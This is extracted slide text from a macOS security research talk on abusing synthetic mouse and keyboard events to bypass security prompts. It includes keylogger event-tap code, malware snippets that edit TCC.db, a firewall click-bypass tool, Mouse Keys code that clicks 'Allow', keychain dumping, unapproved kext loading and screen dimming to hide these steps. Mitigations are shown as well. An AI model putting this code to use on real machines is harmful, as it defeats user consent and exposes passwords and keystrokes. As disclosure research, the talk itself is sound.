  • 16. CoreGraphics APIs "Core Graphics...includes services for working with display hardware, low- level user input events, and the windowing system" -apple 'A' 'A' 'A' 'sniffMK' github.com/objective-see/sniffMK //install & enable CG "event tap" eventMask = CGEventMaskBit(kCGEventKeyDown) | CGEventMaskBit(kCGEventKeyUp); CGEventTapCreate(kCGSessionEventTap, kCGHeadInsertEventTap, 0, eventMask, eventCallback, NULL); CGEventTapEnable(eventTap, true); sniffing keys via 'core graphics' core graphics keylogger
  • 17. CoreGraphics APIs Allow post synthetic keyboard & mouse events! core graphics " "
  • 18. posting a synthetic 'enter' key press CoreGraphics APIs #import <CoreGraphics/CoreGraphics.h> const CGKeyCode ENTER_KEY = (CGKeyCode) 76; void pressENTER() { CGPostKeyboardEvent((CGCharCode)0, ENTER_KEY, true); CGPostKeyboardEvent((CGCharCode)0, ENTER_KEY, false); } synthetically generating an 'enter' keypress Deny Allow perform action 
 (that triggers alert) post a synthetic 'enter' (to dismiss/allow, etc.) " "
  • 19. CoreGraphics APIs synthetic mouse events (OSX.FruitFly) int sub_100001c50(int arg0, int arg1) { rbx = CGEventCreateMouseEvent(0x0, rcx, rdx, rcx); CGEventSetIntegerValueField(rbx, 0x1, r12); CGEventPost(0x1, rbx); CFRelease(rbx); } sub-cmd description 0 move 1 left click (up & down) 2 left click (up & down) 3 left double click 4 left click (down) 5 left click (up) 6 right click (down) 7 right click (up) cmd #8 
 (0,123,456) # ./sniffMK event: kCGEventMouseMoved (x: 123.000000, y: 456.000000) mouse move (x,y) OSX/FruitFly's synthetic mouse capabilities
  • 20. CoreGraphics APIs synthetic keyboard events (OSX.FruitFly) # sniffMK event: kCGEventKeyDown keycode: 0x0/'a' cmd #16, 65 # sniffMK event: kCGEventKeyUp keycode: 0x0/'a' cmd #17, 65 remote typing keydown: AXUIElementPostKeyboardEvent(var_290, 0x0, sub_100001980(rax) & 0xffff, 0x1); goto leave; keyup: AXUIElementPostKeyboardEvent(var_290, 0x0, sub_100001980(rax) & 0xffff, 0x0); goto leave; invokesCGPostKeyboardEvent
  • 21. CoreGraphics APIs synthetic mouse events (OSX/Genieo) $ jtool -d objc -v Installer.app/Contents/MacOS/AppAS @interface SafariExtensionInstaller : ? ... /* 2 - 0x1000376e1 */ + getPopupPosition; ... /* 4 - 0x100037c53 */ + clickOnInstallButton; /* 5 - 0x100037d71 */ + clickOnAllowButtonKeychain; .... /* 8 - 0x100038450 */ + clickOnTrustButton; char +[SafariExtensionInstaller clickOnInstallButton]{ (@selector(getPopupPosition))(&var_40); r14 = CGEventCreateMouseEvent(0x0, 0x5, 0x0, rcx); r15 = CGEventCreateMouseEvent(0x0, 0x1, 0x0, rcx); rbx = CGEventCreateMouseEvent(0x0, 0x2, 0x0, rcx); CGEventPost(0x0, r14); CGEventPost(0x0, r15); CGEventPost(0x0, rbx); " " genieo installer extension installation (safari)
  • 22. CoreGraphics APIs synthetic mouse events (pwnsdx/Unsecure) void doEvent(CGPoint initialMousePosition, CGEventType event) { CGEventRef currentEvent = CGEventCreateMouseEvent(NULL, event, CGPointMake(initialMousePosition.x, initialMousePosition.y), kCGMouseButtonLeft); 
 CGEventPost(kCGHIDEventTap, currentEvent);
 } void clickOnButton(CGPoint initialMousePosition, CGPoint oldLocation) {
 doEvent(initialMousePosition, kCGEventLeftMouseDown); doEvent(initialMousePosition, kCGEventLeftMouseUp);
 ... } int main(int argc, const char * argv[]) { // Little Flocker bypass if([kCGWindowOwnerName isEqualToString:@"Little Flocker"] && [kCGWindowLayer intValue] == 2147483631 && [kCGWindowIsOnscreen intValue] == 1) { clickOnButton(CGPointMake([[kCGWindowBounds valueForKey:@"X"] intValue] + 666, [[kCGWindowBounds valueForKey:@"Y"] intValue] + 280), oldLocation); } // Little Snitch bypass if([kCGWindowName isEqualToString:@"Little Snitch"] && [kCGWindowOwnerName isEqualToString:@"Little Snitch Agent"] && [kCGWindowLayer intValue] == 1490 && [kCGWindowIsOnscreen intValue] == 1) { clickOnButton(CGPointMake([[kCGWindowBounds valueForKey:@"X"] intValue] + 587, [[kCGWindowBounds valueForKey:@"Y"] intValue] + 340), oldLocation); } https://github.com/pwnsdx/Unsecure Allow " " AV products firewalls
  • 23. UI 'bypass' (as we'll see) many UI interfaces are now protected by Apple. However, if one can bypass the UI (i.e. direct file i/o) - no alert will be shown? trusted applications ‣ browser ‣ chat client ‣ email client add ‣ browser ‣ chat client ‣ email client ‣ hacker tool add 'hacker tool' " " ‣ hacker tool
  • 24. 04/2015 UI 'bypass' enabling 'assistive access' for keylogging (OSX.XSLCmd) reverse shell screen capture keylogging "a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems" -fireeye (09/2014) how can OSX/XSLCmd keylog without root? rootpipe: os/x bug, create any file as root!
  • 25. UI 'bypass' enabling 'assistive access' for keylogging (OSX.XSLCmd) r12 = [Authenticator sharedAuthenticator]; rax = [SFAuthorization authorization]; rax = [rax obtainWithRight:"system.preferences" flags:0x3 error:0x0]; [r12 authenticateUsingAuthorizationSync:rbx]; rbx = [NSDictionary dictionaryWithObject:@(0x124) forKey:*_NSFilePosixPermissions]; rax = [NSData dataWithBytes:"a" length:0x1]; rax = [UserUtilities createFileWithContents:rax path:@"/var/db/.AccessibilityAPIEnabled" attributes:rbx]; /var/db/.AccessibilityAPIEnabled =enable access (via UI) OSX/XSLCmd keyloggging! " " via rootpipe
  • 26. UI 'bypass' enabling 'assistive access' for ...? (Dropbox) "Dropbox didn’t ask for permission to take control of your computer" - phil stokes "Revealing Dropbox’s Dirty Little Security Hack" applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/ where was the "accessibility" prompt?! Dropbox Installer
  • 27. UI 'bypass' enabling 'assistive access' for ...? (Dropbox) "Revealing Dropbox’s Dirty Little Security Hack" applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/ /Library/Application Support/ com.apple.TCC/TCC.db INSERT INTO access VALUES('kTCCServiceAccessibility',
 'com.getdropbox.dropbox',0,1,0); } strings in 'dbaccessperm' so dropbox is inserting itself directly into TCC.db...
  • 28. UI 'bypass' enabling 'assistive access' for ...? (Dropbox) "Revealing Dropbox’s Dirty Little Security Hack" applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/ $ file "/Library/Application Support/com.apple.TCC/TCC.db" /Library/Application Support/com.apple.TCC/TCC.db: SQLite 3.x database # fs_usage -w -f filesystem | grep -i tcc.db /Library/Application Support/com.apple.TCC/TCC.db-journal /Library/Application Support/com.apple.TCC/TCC.db-wal avoids this ;) UI, backed by TCC.db
  • 29. UI 'bypass' TCC.db modification (OSX.ColdRoot) __const:001D2804 "touch /private/var/db/.AccessibilityAPIEnabled && sqlite3 "/Library/ Application Support/com.apple.TCC/TCC.db" "INSERT or REPLACE INTO access (service, client, client_type, allowed, prompt_count) VALUES ('kTCCServiceAccessibility'.... com.apple.audio.driver.app unsigned packed password } 'TCC.db' reference...
  • 30. UI 'bypass' TCC.db modification (OSX.ColdRoot) $ cat /private/var/tmp/runme.sh #!/bin/sh touch /private/var/db/.AccessibilityAPIEnabled && sqlite3 "/Library/Application Support/com.apple.TCC/TCC.db" "INSERT or REPLACE INTO access (service, client, client_type, allowed, prompt_count) VALUES ('kTCCServiceAccessibility', 'com.apple.audio.driver', 0, 1, 0);" auth prompt accessibly access
  • 31. digita security MITIGATIONS how Apple (et. al) protect the UI
  • 32. Blocking AppleScript UI Interactions commands tell process "SecurityAgent" click button "Allow" .... end tell " " $ log show tccd PID[44854] is checking access for target PID[44855] tccd Service kTCCServiceAccessibility does not allow prompting; returning preflight_unknown execution error: System Events got an error: osascript is not allowed assistive access. (-1719) OS alert try click... log messages tccd access check?
  • 33. Blocking AppleScript # fs_usage -w -f filesystem | grep tccd RdData /Library/Application Support/com.apple.TCC/TCC.db tccd open /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal tccd access /Applications/Utilities/Terminal.app/Contents/_CodeSignature tccd WrData /Library/Application Support/com.apple.TCC/TCC.db tccd tccd is an OS daemon that manages the privacy database, TCC.db " " tccd, checks TCC.db tccd interactions with TCC.db Blocking AppleScript UI Interactions TCC.db
  • 34. Blocking Core Graphic Events " " password prompt Core Graphics events may now trigger an authentication prompt, or be ignored when sent to 'protected' OS alerts!
  • 35. Blocking Core Graphic Events default 08:52:57.441538 -1000 tccd PID[209] is checking access for target PID[25349] error 08:52:57.657628 -1000 WindowServer Sender is prohibited from synthesizing events int post_filtered_event_tap_data(int arg0, int arg1, int arg2, int arg3, int arg4, int arg5) if (CGXSenderCanSynthesizeEvents() == 0x0) goto loc_702e9; loc_702e9: if (os_log_type_enabled(*_default_log, 0x10) != 0x0) { rbx = *_default_log; _os_log_error_impl(..., rbx, 0x10, "Sender is prohibited from synthesizing events",...); } int CGXSenderCanSynthesizeEvents() { ... rax = sandbox_check_by_audit_token("hid-control", 0x0, rdx, rdx); user-mode check: 
 'CGXSenderCanSynthesizeEvents' kernel-mode check: 'mpo_iokit_check_hid_control_t'
  • 36. Protecting TCC.db $ ls -lartO "/Library/Application Support/com.apple.TCC/TCC.db" 
 -rw-r--r-- 1 root wheel restricted TCC.db; now protected by SIP #_ cmp byte ptr [eax+38h], 0 jz short accessibilityError mov cl, 0 lea edx, "/private/var/tmp/" lea eax, "Accessibility OK " call _DEBUGUNIT_$$_LOGKEY$ANSISTRING$ANSISTRING$BOOLEAN mov edx, 1 mov eax, ds:(_VMT_$KEYLOSER_$$_TKEYLOGGERTHREAD_ptr - 11D95h)[ebx] call _KEYLOSER$_$TKEYLOGGERTHREAD_$__$$_CREATE$$TKEYLOGGERTHREAD jmp short continue accessibilityError: mov cl, 0 lea edx, "/private/var/tmp/tmp34322gsdlj.log" lea eax, "Accessibility Error " call _DEBUGUNIT_$$_LOGKEY$ANSISTRING$ANSISTRING$BOOLEAN TCC.db OSX/Coldroot SIP == no keylogging!
  • 37. Summarizing Apple's Protections AppleScript require
 'accessibility rights' UI 'bypass' protect privacy database (TCC.db) with SIP CoreGraphics filter 'synthetic events' though, only 'OS-security-relevant' windows are protected!? think 3rd-party security products...
  • 38. 3rd-party Protection BlockBlock " " -(void)mouseDown:(NSEvent *)event { //get event's pid & uid processID = CGEventGetIntegerValueField(event.CGEvent, kCGEventSourceUnixProcessID); processUID = CGEventGetIntegerValueField(event.CGEvent, kCGEventSourceUserID); //block if: // a) not: root, or uid (root) or uid (_hidd) // b) not: not an apple-signed binary if( (0 != processID) && (0 != processUID) && (HID_UID != processUID) && (YES != binary.isApple) ) { //bail logMsg(LOG_ERR, "ignoring simulated mouse event"); return; } //allow [super mouseDown:event]; user click pid: 0
 uid: 0
  • 40. 3rd-party Protection char -[NSEvent isSimulated]{ rbx = self; rax = [self type]; //type of event (mouse/keyboard?) if ((rax <= 0xb) && (!(BIT_TEST(0xc06, rax)))) { //get cg event rbx = sub_10003034b(rbx); //check 'kCGEventSourceStateID' (0x2d) and 'kCGEventSourceUnixProcessID' (0x29) if (((rbx != 0x0) && (CGEventGetIntegerValueField(rbx, 0x2d) != 0x1)) && (CGEventGetIntegerValueField(rbx, 0x29) != getpid())) { //get path rbx = sub_10003039e(rbx); //exceptions for 'ScreensharingAgent' and 'AppleVNCServer' if ([sub_100030478() containsObject:rbx] != 0x0) { rcx = 0x0; } else { rcx = 0x1; } } else { rcx = 0x0; } } rax = rcx & 0xff; return rax; } LittleSnitch (firewall) kCGEventSourceStateID Little Snitch's synthetic event detection
  • 41. digita security FINDING A BYPASS synthetically interact with the UI
  • 42. The Goal target: High Sierra privs: Normal user (no root) goal: Programmatically interact with any OS UI prompt bypass Apple's UI protections allowdeny! x <process> is trying to access <stuff> alert! " " } keychain kexts bypass apple's protections
  • 43. 'Mouse Keys' your keyboard is now the mouse "you can move the mouse pointer and press the mouse button using the keyboard" -apple apple docs mouse keyboard mappings = click i or 5 will Apple 'allow'?!
  • 44. Enabling Mouse Keys //enable 'mouse keys' void enableMK(float X, float Y){
 //apple script NSAppleScript* scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application "System Preferences"n" "activaten" "reveal anchor "Mouse" of pane id "com.apple.preference.universalaccess"n" "end tell"]; //exec [scriptObject executeAndReturnError:nil]; //let it finish sleep(1); //clicky clicky CGPostMouseEvent(CGPointMake(X, Y), true, 1, true); CGPostMouseEvent(CGPointMake(X, Y), true, 1, false); return; } " " launch: System Preferences open: Accessibility pane, and show Mouse anchor click: 'Enable Mouse Keys' enabling 'Mouse Keys' in code
  • 45.
  • 46. Sending a click //click via mouse key void clickAllow(float X, float Y) { //move mouse CGEventPost(kCGHIDEventTap, CGEventCreateMouseEvent(nil, kCGEventMouseMoved, CGPointMake(X, Y), kCGMouseButtonLeft)); //apple script NSAppleScript* scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application "System Events" to key code 87n"]; //exec [scriptObject executeAndReturnError:nil]; } sending a synthetic click note: keypad 5: key code 87 # ./sniffMK event: key down keycode: 0x57/87/5 event: key up keycode: 0x57/87/5 event: left mouse down (x: 146.207031, y: 49.777344) event: left mouse up (x: 146.207031, y: 49.777344)the key press also generates a 'mouse' event that apple does not block!!
  • 48. Dumping the Keychain all your passwords/keys are belong to us private keys passwords auth tokens $ /usr/bin/security dump-keychain -d login.keychain keychain: "~/Library/Keychains/login.keychain-db" class: "genp" attributes: 0x00000007 <blob>="GitHub - https://api.github.com" dumping keys } " " mouse click to 'allow' data: "7257b03422bbab65f0e7d22be57c0b944a0ae45d9e"
  • 50. Bypassing 'User-Approved Kernel Extension Loading' # loadKext evil.kext [+] invoking kext load [+] opening security & privacy pane [+] sending 'click' to allow [+] success! 'evil.kext' loaded //init apple script // open 'General' tab of 'Security Pane' scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application "System Preferences"n" "activaten" "reveal anchor "General" of pane id "com.apple.preference.security"n" "end telln"]; //execute to open prefs [scriptObject executeAndReturnError:nil]; high sierra kext loader open 'General' tab of 'Security & Privacy' pane " "
  • 51.
  • 52. Making these attacks 'invisible' allow x <process> is trying to access <stuff> alert! " "deny! Q: "how can synthetic events interact with the UI in a manner that is not visible to the user?" the obvious problem: visibility... A: display brightness = 0
  • 53. Making these attacks 'invisible' void setBrightnessTo(float level) { io_iterator_t iterator;
 io_object_t service; IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IODisplayConnect"), &iterator); while ((service = IOIteratorNext(iterator))) { IODisplaySetFloatParameter(service, kNilOptions, CFSTR(kIODisplayBrightnessKey), level); IOObjectRelease(service); } IOObjectRelease(iterator); } " " dimming the display level: 0 is 'off' UI interactions still possible when screen dimmed! screen brightness ftw!
  • 54. Making these attacks 'invisible' wait to dim until the user is inactive CFTimeInterval idleTime() { return CGEventSourceSecondsSinceLastEventType( kCGEventSourceStateHIDSystemState, kCGAnyInputEventType); } while(idleTime() < 60.0) { [NSThread sleepForTimeInterval:5.0f]; } //user inactive // a) screen brightness to 0 // b) enable mouse keys & click clack! detecting 'inactive' user
  • 55. Making these attacks 'invisible' wait to dim until the display is going to sleep OS sends kIOMessageCanDevicePowerOff OS sends kIOMessageDeviceWillPowerOff screen dims to 50% screen dims to 100%, then off }dim to 100% exploit(); " " void displayCallback(void *context, io_service_t y, natural_t msgType, void *msgArgument){ if(kIOMessageCanDevicePowerOff == msgType) //a) dim to 100% //b) exploit! } display = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("IODisplayWrangler")); IOServiceAddInterestNotification(IONotificationPortCreate(kIOMasterPortDefault), display, kIOGeneralInterest, displayCallback, NULL, &notifier); CFRunLoopAddSource(CFRunLoopGetMain(), IONotificationPortGetRunLoopSource(IONotificationPortCreate(kIOMasterPortDefault)),kCFRunLoopDefaultMode); detecting display going to sleep
  • 57. " " Patching 'Mouse Keys' & Synthetic Events CVE-2017-7150, High Sierra Supplemental Update High Sierra "Supplemental Update" password prompt password prompt $ log stream | grep mouse Dropping mouse down event because sender's PID (899) isn't 0 or self (828) filtration of synthetic events
  • 58. ...one more thing: an 0day still trivial way to generate synthetic events! //given some point {x, y} // generate synthetic event... CGPostMouseEvent(point, true, 1, true); CGPostMouseEvent(point, true, 1, true); mouse down mouse down ...AGAIN!! Q: Even after Apple's patch can you send two "mouse down" events to generate an ALLOWED synthetic mouse click?
 A: Yes, really... synthetically click away! and yes, this means since its introduction "user-approved kext loading" has NEVER been secure!
  • 59. a truly powerful capability Synthetic Reality dump keychain approve kexts capture keystrokes thwart tools allowdeny! x <process> is trying to access <stuff> alert! " " }
  • 60. the cat & mouse game continues! Synthetic Reality apple script core graphics UI bypass mouse keys passwords accessibility access system integrity protection filter synthetic events vs. macOS Mojave generically blocks: applescript interactions core graphics apis
  • 61. ...ok, one more last thing! "Objective by the Sea" conference ObjectiveByTheSea.com Maui, Hawaii Nov 3rd/4th All things macOS malware bugs security Free for Objective-See patrons!
  • 63. Credits - iconexperience.com - wirdou.com/2012/02/04/is-that-bad-doctor - http://pre04.deviantart.net/2aa3/th/pre/f/ 2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg
 
 - opensource.apple.com - newosxbook.com (*OS Internals) - "Revealing Dropbox’s Dirty Little Security Hack"
 applehelpwriter.com/2016/08/29/discovering-how- dropbox-hacks-your-mac/ images resources